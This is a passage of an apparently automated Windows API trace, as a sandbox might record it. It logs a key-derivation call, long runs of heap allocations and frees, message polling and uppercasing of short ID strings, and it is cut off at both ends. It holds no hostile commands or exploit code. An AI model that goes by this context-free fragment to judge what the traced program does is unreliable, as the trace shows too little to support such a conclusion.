CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0149.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa288, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0149.938] CryptDeriveKey (in: hProv=0x9bf550, Algid=0x6601, hBaseData=0x9e20f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2278) returned 1 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0149.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0149.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0149.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0149.939] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0149.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b80 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0149.940] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2aae878 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7720 | out: hHeap=0x2af0000) returned 1 [0149.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0149.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0149.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0149.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0149.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0149.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0149.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0149.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0149.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0149.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0149.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0149.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0149.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0149.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa438 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa528 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2e8 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4c8 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0149.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa498 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa300 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa390 [0149.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3c0 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0149.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa468 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa330 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4e0 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3d8 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4f8 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa510 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2a0 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0149.944] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0149.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa348 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743a0 [0149.944] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0149.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0149.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0149.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0149.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0149.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0149.945] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0149.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0149.945] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0149.945] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0149.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0149.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0149.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0149.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0149.945] 